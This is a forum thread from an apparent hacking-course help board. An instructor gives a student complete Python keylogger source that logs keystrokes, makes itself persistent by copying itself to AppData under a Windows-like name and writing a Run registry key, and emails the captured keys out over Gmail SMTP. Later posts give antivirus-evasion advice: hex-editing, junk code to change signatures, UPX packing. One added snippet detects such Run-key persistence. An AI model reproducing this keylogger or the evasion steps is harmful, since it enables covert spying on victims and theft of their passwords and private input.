Viewing 8 posts - 1 through 8 (of 8 total)
  • #26068
    alisonsmith494
    Participant

    Hello Zaid,
    I followed the keylogger and backdoor course. You did not cover how to include persistence in the keylogger. I tried to do it by myself, following the code you used in the backdoor, and I got the following error:
    [email protected]:~/PycharmProjects/keylogger# python zlogger.py
    Traceback (most recent call last):
    File “zlogger.py”, line 4, in <module>
    my_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    File “/root/PycharmProjects/keylogger/keylogger.py”, line 10, in __init__
    self.become_persistent()
    File “/root/PycharmProjects/keylogger/keylogger.py”, line 17, in become_persistent
    evil_file_location = os.environ[“appdata”] + “\\Windows Explorer.exe”
    NameError: global name ‘os’ is not defined

    Please put together a short video showing how to fix the persistence in the keylogger.

    #26133
    AJ
    Participant

    Hi Alison,

    Sorry for the late reply. Can you show me the source code of the zlogger.py, so we can better debug the issue please?
    Thank you.

    #26139
    alisonsmith494
    Participant

    Hello AJ,
    Below is the source code of the keylogger and zlogger:

    Keylogger:

    #!/usr/bin/env python
    import pynput.keyboard
    import threading
    import smtplib

    class Keylogger:
    def __init__(self, time_interval, email, password):
    self.log = “Keylogger started”
    self.interval = time_interval
    self.email = email
    self.password = password

    def append_to_log(self, string):
    self.log = self.log + string

    def process_key_press(self, key):
    try:
    current_key = str(key.char)
    except AttributeError:
    if key == key.space:
    current_key = ” ”
    else:
    current_key = ” ” + str(key) + ” ”
    self.append_to_log(current_key)

    def report(self):
    self.send_mail(self.email, self.password, “\n\n” + self.log)
    self.log = “”
    timer = threading.Timer(self.interval, self.report)
    timer.start()

    def send_mail(self, email, password, message):
    server = smtplib.SMTP(“smtp.gmail.com”, 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

    def start(self):
    keyboard_listener =pynput.keyboard.Listener(on_press=self.process_key_press)
    with keyboard_listener:
    self.report()
    keyboard_listener.join()

    ================
    Zlogger

    #!/usr/bin/env python
    import keylogger

    my_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    my_keylogger.start()

    ========================================
    And I tried to use the code below to make the zlogger persistent in Windows, but I keep getting an error:

    import shutill
    import sys

    self.become_persistent()

    def become_persistent(self):
    location = os.environ[“appdata”] + “\\windowsupdate.exe”
    if not os.path.exists(location):
    shutil.copyfile(sys.executable, location)
    subprocess.call(‘reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d “‘ + location + ‘”‘, shell=True)

    I look forward to hearing from you with a solution.

    Regards.

    #26237
    AJ
    Participant

    Hi Alison,

    I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence and it worked. Please check the following source code, and try to use it for later debugging or if you want to build on this:

    klog_object.py

    
    #!/usr/bin/env python
    import persistent_keylogger
    my_keylogger = persistent_keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    my_keylogger.start()
    

    Actual code of persistence_keylogger.py

    
    #!/usr/bin/env python
    import pynput.keyboard
    import threading
    import smtplib
    import shutil
    import os
    import sys
    import subprocess
    
    class Keylogger:
    	def __init__(self, time_interval, email, password):
        	        self.log = "Keylogger started"
    		self.become_persistent()
    	        self.interval = time_interval
    	        self.email = email
    	        self.password = password
    
    	def become_persistent(self):
            	evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
            	if not os.path.exists(evil_file_location):
                	    shutil.copyfile(sys.executable, evil_file_location)
    		    subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)
    
    	def append_to_log(self, string):
    		self.log = self.log + string
    
    	def process_key_press(self, key):
    		try:
    			current_key = str(key.char)
    		except AttributeError:
    			if key == key.space:
    				current_key = " "
    			else:
    				current_key = " " + str(key) + " "
    		self.append_to_log(current_key)
    
    	def report(self):
    		self.send_mail(self.email, self.password, "\n\n" + self.log)
    		self.log = ""
    		timer = threading.Timer(self.interval, self.report)
    		timer.start()
    
    	def send_mail(self, email, password, message):
    		server = smtplib.SMTP("smtp.gmail.com", 587)
    		server.starttls()
    		server.login(email, password)
    		server.sendmail(email, email, message)
    		server.quit()
    
    	def start(self):
    		keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
    		with keyboard_listener:
    			self.report()
    			keyboard_listener.join()
    

    Note: I’ve changed the names of the files and tested the keylogger with my Gmail, even after the target system had been restarted, but I put your name back in for convenience. Make sure that you use the correct file names, since I changed them when I edited the above source code.

    Please let me know how it goes. Thank you.
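
A defender-side check for the persistence set up by the code above, written as an added example (not part of AJ's post or the course code): it parses `reg query` output for the HKCU Run key and flags values that point at an executable dropped directly in %APPDATA% or named like a Windows component. The sample output, the user name and the file-name patterns are constructed assumptions.

```python
import re
from ntpath import basename, dirname, normpath  # Windows path rules on any OS

# Constructed sample of `reg query` output for the HKCU Run key (not a real host).
SAMPLE = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Notes    REG_SZ    "C:\Users\alice\AppData\Roaming\NotesApp\notes.exe"
    update    REG_SZ    "C:\Users\alice\AppData\Roaming\Windows Explorer.exe"
'''

ENTRY = re.compile(r'^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$')
ROAMING_ROOT = re.compile(r'\\AppData\\Roaming$', re.I)
# Assumed, deliberately short list of names that imitate Windows components.
SYSTEM_LOOKALIKE = re.compile(r'windows|explorer|svchost', re.I)

def exe_path(data):
    """Program path from a Run value; unquoted paths are cut at the first space."""
    m = re.match(r'"([^"]+)"|(\S+)', data)
    return normpath(m.group(1) or m.group(2)) if m else ""

def audit(reg_output):
    """Return (value name, path, reasons) for each suspicious Run entry."""
    findings = []
    for line in reg_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # key header or blank line
        path = exe_path(m["data"])
        reasons = []
        # Installed software normally lives in a vendor subfolder, not the root.
        if ROAMING_ROOT.search(dirname(path)):
            reasons.append("executable sits directly in %APPDATA%")
        # Assumes the default system directory C:\Windows.
        in_windir = path.lower().startswith("c:\\windows\\")
        if SYSTEM_LOOKALIKE.search(basename(path)) and not in_windir:
            reasons.append("system-sounding file name outside C:\\Windows")
        if reasons:
            findings.append((m["name"], path, reasons))
    return findings

if __name__ == "__main__":
    for name, path, reasons in audit(SAMPLE):
        print(f"[!] Run value {name!r} -> {path}: " + "; ".join(reasons))
```

On a live host the input would be the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, saved to a file or piped in.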

    #26257
    alisonsmith494
    Participant

    Hi AJ,

    Thanks for your reply. The most important challenge now is how to bypass Windows Defender. My Klogger and payload never get executed on Windows. Please, I need help on how to bypass Windows Defender. I have tried all your evasion but still get detected. Is there any crypter or way to bypass Defender…

    Thanks

    #26289
    AJ
    Participant

    Hi Alison,

    Please give me some time, and I’ll get back to you ASAP. BTW, did the persistence feature work for you?

    #26404
    alisonsmith494
    Participant

    Hi AJ,

    Thanks for the response. Yes, the feature works, but Windows 10 Defender never allows me to try it. If there is a dropper or crypter to bypass Defender, I would appreciate it…

    Regards.

    #26437
    AJ
    Participant

    Hi Alison,

    You have several options to bypass Windows defender, so you can:

    1. Modify the backdoor executable after packaging using a hex editor, so you can use hexeditor <filename> that comes pre-installed in Kali, and try to modify some part of it, but please make sure that you don’t break the payload. Now Zaid does cover how to do this in the “Social Engineering” course, though you can check for more examples online to build on this as shown below:
    https://null-byte.wonderhowto.com/how-to/hack-your-game-saves-basic-guide-hex-editing-0132155/
    https://hackingandsecurity.blogspot.com/2016/03/fud-through-hex-editor-heading.html

    2. Add some random data like various printing functions, statements, and by including new variable names to make the backdoor look more unique, thus increasing the chance of generating a unique signature that can bypass Windows Defender signatures DB. Now, this seems daunting, but this process is a trial and error process, so you have to try to edit the code without breaking it after you package the backdoor python source code of the “klog_object.py”. You can also install upx to enhance the backdoor exe when you test it on nodistribute.com from
    https://github.com/upx/upx/releases/

    Now, this is covered in section 15, in which you will learn how to bypass a reasonable number of AV if you follow the same procedure and the above notes and resources.

    Please let me know if you face any issues again. Thank you.
